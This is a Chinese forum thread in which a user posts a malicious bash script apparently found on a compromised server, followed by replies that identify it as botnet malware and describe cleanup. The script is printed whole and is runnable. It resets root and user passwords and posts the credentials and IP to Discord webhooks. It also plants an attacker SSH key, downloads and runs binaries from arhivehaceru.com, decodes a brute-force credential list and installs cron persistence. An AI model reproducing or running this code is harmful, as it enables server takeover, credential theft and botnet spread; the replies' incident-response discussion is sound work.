#!/bin/bash
#########################################################
#########################################################
cd /var/tmp/.update-logs >/dev/null 2>&1
sleep 1
curl --socks5 proxy:hypekebap@arhivehaceru.com:1080 discord.com
if [ $(id -u) = 0 ]; then
usermod -p '$1$RZY$KVZ7I.m2YqYQK87d3txab1' root
else
user=`whoami`
pass=`date +%s | sha256sum | base64 | head -c 8 ; echo`
ip=`curl ifconfig.me`
cores=`nproc`
echo -e "$user\n$pass\n$pass" | passwd ; echo -e "$user123\n$pass\n$pass" | passwd ; echo -e "$user123456\n$pass\n$pass" | passwd ; echo -e "123456\n$pass\n$pass" | passwd ; echo -e "123\n$pass\n$pass" | passwd ; echo -e "111111\n$pass\n$pass" | passwd ; echo -e "1qaz@WSX\n$pass\n$pass" | passwd ; echo -e "password\n$pass\n$pass" | passwd ; echo -e "P@ssw0rd\n$pass\n$pass" | passwd ; echo -e "1234567890\n$pass\n$pass" | passwd ; echo -e "1234567890\n$pass\n$pass" | passwd
echo '
{
"content": null,
"embeds": [
{
"title": "[ SSH ] Password has been changed",
"description": "[ IP ] '$ip'\n[+] [ User ] '$user' \n[+] [ Password ] '$pass' \n [+] [ Procesoare ] '$cores'",
"color": 1337
}
]
}
' > /tmp/.send.json
url='https://discord.com/api/webhooks/1048557019931607130/Uw-AJ_yDvDCYhmFUkjiGTgeLWX6QSPXmg8bc4u4tGyBlDZDq2QpXLSDeFpOynBAcjKxY'
curl --connect-timeout 15 -H "Content-Type: application/json" --data @/tmp/.send.json $url >/dev/null 2>&1
fi
#########################################################
#########################################################
echo 'ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAoBjnno5GBoIuIYIhrJsQxF6OPHtAbOUIEFB+gdfb1tUTjs+f9zCMGkmNmH45fYVukw6IwmhTZ+AcD3eDpgsTloqmVgcXDUmvjWR/fNiImmgU9wlw/lalf/WrIuCDp0PArQtjNg/vo7HUGq9SrEIE2jvyVW59mvoYOwfnDLUiguKZirZgpjZF2DDKK6WpZVTVpKcH+HEFdmFAqJInem/CRUE0bqjMr88bUyDjVw9FtJ5EmQenctjrFVaB7hswOaJBmFQmn9G/BXkMvZ6mX7LzCUM2PVHnVfVeCLdwiOINikzW9qzlr8WoHw4qEGJLuQBWXjJu+m2+FdaOD6PL53nY3w== ElPatrono1337' >> ~/.ssh/authorized_keys && chmod -R go= ~/.ssh
rm -rf /etc/sysctl.conf >/dev/null 2>&1 ; echo "fs.file-max = 2097152" > /etc/sysctl.conf >/dev/null 2>&1 ; sysctl -p >/dev/null 2>&1 ; ulimit -Hn >/dev/null 2>&1 ; ulimit -n 99999 -u 999999 >/dev/null 2>&1
if [ -f Chrome ]; then
:
else
wget -q arhivehaceru.com/.x/Chrome --no-check-certificate || curl -s -L -O arhivehaceru.com/.x/Chrome
chmod 777 Chrome
fi
if [ -f aliases ]; then
:
else
wget -q arhivehaceru.com/.x/aliases --no-check-certificate || curl -s -L -O arhivehaceru.com/.x/aliases
chmod 777 aliases
echo '
{
"content": null,
"embeds": [
{
"title": "",
"description": "Infected Secure Server Shell [ SSH ] on '$(curl ifconfig.me)'",
"color": 1337
}
]
}
' > /tmp/.send.json
url='https://discord.com/api/webhooks/1036225255049531422/qyOrT3SxHaOC-9yS2NQiPxlSMYmRFFIpU-rMKzmcDv9pQyP4uaZEiZXDXioUtf0DJLUB'
curl --connect-timeout 15 -H "Content-Type: application/json" --data @/tmp/.send.json $url >/dev/null 2>&1
fi
if [ -f protocols ]; then
:
else
echo 'YWRtaW4gMTIzNAphZG1pbiAxMjM0NTYKYWRtaW4gYWRtaW4KYWRtaW4gYWRtaW4xMjMKYWRtaW4gcGFzc3dvcmQKY2VudG9zIDEyMzQ1NgpjZW50b3MgY2VudG9zCmRlZmF1bHQgMQpndWVzdCBndWVzdApwaSBwaQpwaSByYXNwYmVycnkKZGViaWFudXNlciAxcWF6WFNXQApyb290IDEKcm9vdCAxMjMKcm9vdCAxMjM0NTYKcm9vdCAxMjM0NTY3ODkwCnJvb3QgQWExMjM0NTYKcm9vdCBhZG1pbgpyb290IHBhc3N3b3JkCnJvb3QgcEBzc3cwcmQKcm9vdCBQQHNzdzByZApyb290IHJvb3QKdGVzdCB0ZXN0CnVibnQgdWJudAp1c2VyIHVzZXIKcm9vdCBBZG1pbkAxMjMKdGVzdCAxMjM0NTYKdGVzdCB0ZXN0CmdpdCBnaXQKZ2l0IDEyMzQ1NgpndWVzdCBndWVzdAp1YnVudHUgdWJ1bnR1CnVidW50dSAxMjM0NTYKZ3Vlc3QgMTIzNDU2CnJvb3QgdG9vcgo=' | base64 -d > /var/tmp/.update-logs/protocols
fi
#########################################################
#########################################################
crontablegend() {
locatie="$(pwd)"
if ! crontab -l | grep -q 'Update'; then
rm -rf /var/tmp/.update-logs/.5p4rk3l5
echo "@daily /var/tmp/.update-logs/./Update" >> /var/tmp/.update-logs/.5p4rk3l5
sleep 1
echo "@reboot /var/tmp/.update-logs/./Update" >> /var/tmp/.update-logs/.5p4rk3l5
sleep 1
echo "* * * * * /var/tmp/.update-logs/./History" >> /var/tmp/.update-logs/.5p4rk3l5
sleep 1
echo "@monthly /var/tmp/.update-logs/./Update " >> /var/tmp/.update-logs/.5p4rk3l5
sleep 1
crontab /var/tmp/.update-logs/.5p4rk3l5
sleep 1
source ~/.bashrc >/dev/null 2>&1
rm -rf /var/tmp/.update-logs/.5p4rk3l5
fi
}
#########################################################
#########################################################
crontablegend
sleep 0.5
wait
#########################################################
#########################################################
RANGE=244
number=$RANDOM
number1=$RANDOM
let "number %= $RANGE"
let "number1 %= $RANGE"
./Chrome $number.$number1 22 > /dev/null 2>&1
sleep 1
cat bios.txt | sort | uniq > ips
cat ips > bios.txt
./aliases > /dev/null 2>&1
sleep 2
rm -rf bios.txt ips
pkill aliases
pkill -STOP aliases
pkill Chrome
pkill -STOP Chrome
sleep 3
./Update </dev/null &>/dev/null & disown -h %1
#########################################################
离线
应该是被黑了。搜arhivehaceru搜到这个:
https://elkeid.bytedance.com/Chinese/malicious_file_analyze/elkeid_20221202_botnet_8.html
再检查一下是不是还有py脚本,说是在挖矿:
https://elkeid.bytedance.com/Chinese/malicious_file_analyze/elkeid_20221202_botnet_9.html
离线
看起来,你在给别人当肉鸡。
离线
把脚本里自动创建的定时任务删除了,账户密码修改了,目前还未发现异常
离线
要说这脚本没问题 我都不相信, 把消息通过discord发出去, 然后再下两程序在机子里跑, 你觉得像益生菌么
离线